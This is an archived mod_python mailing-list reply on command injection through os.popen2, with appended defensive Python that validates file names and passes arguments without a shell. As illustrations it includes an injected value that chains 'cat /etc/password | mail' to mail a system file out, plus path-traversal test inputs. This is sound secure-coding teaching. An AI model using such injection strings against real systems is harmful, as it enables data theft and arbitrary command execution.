[mod_python] Pipes and security

webograph webograph at eml.cc
Tue Jul 25 06:55:22 EDT 2006


hi richard,

if you use a static command like "cmd", the script is perfectly all
right. you can easily run into problems if you pass unfiltered user data
to a command:
i, o = os.popen2("cmd files/%s" % user_input)
will get you into Very Big Trouble -- the user could pass "foo; cat
/etc/password | mail me at my.domain" to get a list of users in your system,
for example -- in other words, execute arbitrary commands.

if you have to use user input to build commands:
- check if they are valid (if user_input in list_of_valid_options, for
example)
- escape everything properly or, even better, use process functions that
don't call the system's command interpreter (/bin/sh) on unix. use, for
example, subprocess.call (http://docs.python.org/lib/node236.html) -- no
matter what the user passes to subprocess.call(["openssl", "verify",
user_input]), the only process a malicious user can call is openssl.

regards
webograph

p.s. is there some configuration error in the mailing list? when i 
replied 15 minutes ago, the mail was sent to the original sender 
directly; afaik there should be some reply-to header appended by mailman

Richard Lewis wrote:

>Hi there,
>
>Just investigating some possible implementation methods.
>
>Does it pose a security risk in mod_python to do this sort of thing:
>
>def handler(req):
>  # code is from memory so may not be correct
>  # but it's the idea that's important ;-)
>  i, o = os.popen2("cmd")
>  i.write("some data")
>  i.close()
>  
>  req.write(o.read())
>  o.close()
>
>I don't really understand it properly, but I've read before now that using 
>pipes to execute shell commands from CGI scripts can be insecure. Does the 
>same apply with Apache modules like mod_python?
>
>Cheers,
>Richard
>  
>
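The two recommendations in the reply above (validate the input, then pass it as an argument list with no shell), as an added example that is not part of the original thread. It is written for Python 3 with subprocess.run; the SAFE_NAME pattern, the function names and the stand-in child process that echoes its argv (used in place of "cmd" so the example runs offline) are assumptions.

```python
import json
import re
import subprocess
import sys

# Hypothetical allowlist: a plain file name, no path separators, no leading "." or "-".
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")

# Stand-in for "cmd" (assumption): a child process that reports the argv it got.
ECHO_ARGV = [sys.executable, "-c",
             "import json, sys; print(json.dumps(sys.argv[1:]))"]

# The hostile input quoted in the reply (constructed sample value).
HOSTILE = "foo; cat /etc/password | mail me at my.domain"


def child_argv(arg):
    """Run the stand-in command with arg as ONE argv element and no shell."""
    proc = subprocess.run(ECHO_ARGV + [arg], capture_output=True,
                          text=True, check=True, timeout=10)
    return json.loads(proc.stdout)


def run_on_file(user_input):
    """Validate the name first, then build the argument list."""
    # Without /bin/sh, ";" and "|" are inert, but "../" would still escape
    # the files/ directory, so the name is checked before it is used.
    if not SAFE_NAME.fullmatch(user_input):
        raise ValueError("rejected file name: %r" % user_input)
    return child_argv("files/" + user_input)


if __name__ == "__main__":
    # No shell: the whole hostile string arrives as a single argument.
    print(child_argv("files/" + HOSTILE))
    # Validated path: accepted names go through, everything else is refused.
    print(run_on_file("report.txt"))
    for bad in (HOSTILE, "../../etc/passwd", "-rf"):
        try:
            run_on_file(bad)
        except ValueError as exc:
            print(exc)
```

The list form removes shell interpretation only; the allowlist check is what keeps the path inside files/.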



